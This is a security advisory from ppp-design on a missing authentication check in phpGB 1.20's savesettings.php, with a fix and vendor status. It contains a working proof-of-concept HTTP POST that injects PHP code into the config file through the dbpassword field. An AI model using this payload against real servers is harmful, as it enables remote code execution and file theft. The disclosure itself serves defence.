logo

Web

   Webdesign
   Webhosting
   Referenzen
   Kontakt

Security

   Aktuelle Meldungen
   Advisories
   Firewall
   Emailgateway

Consulting

   Beratung

Hinweise
   Aktuelle Meldungen    Advisories    Firewall    Emailgateway

ppp-design found the following design error in phpGB:


Details

Product: phpGB
Affected Version: 1.20 and maybe all versions before
Immune Version: 1.30
OS affected: all OS with php
Vendor-URL: http://www.walzl.net
Vendor-Status: informed, new version avaiable
Security-Risk: high - very high
Remote-Exploit: Yes


Introduction

phpGB is a php/mysql based guestbook. Admin can change all settings within a php interface. Unfortunately the script lacks correct authentification, so everybody is able to override a config file, which leads to a DoS or to running arbitrary php commands on the server.


More details

The problem is in /admins/savesettings.php. The only check for authentification is made is a check for the page being requested via POST. That is why it is very easy to fake authentification and to write anything to /include/config.php. Because this is a major file of the software being included nearly on every page, a syntax error leads to a DoS of the whole guestbook. One more security aspect is the ability to insert arbitrary commands in the config file. When avoiding syntax errors, a possible blackhat is able to execute any php command on the server.


Proof-of-concept

After running the following proof of concept, you are presented with phpinfo() on every page of the guestbook. Of course you can insert any php code instead of phpinfo(); into /include/config.php. (\n is newline)

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n


Temporary-fix

Use .htaccess to restrict access to admin pages.


Fix

Use at least phpGB 1.30.


Security-Risk

Because a attacker is able to execute any php command, he is able to read all files including .htaccess or .htpasswd files or any password protected pages. Depending on system security he might be able to run any shell command on the server. That is why we are rating this security issue to high - very high.


Vendor status

After we have informed the author he needed about 12 hours for a new version.


Disclaimer

All information that can be found in this advisory is believed to be true, but maybe it isn't. ppp-design can not be held responsible for the use or missuse of this information. Redistribution of this text is only permitted if the text has not been altered and the original author ppp-design (http://www.ppp-design.de) is mentioned.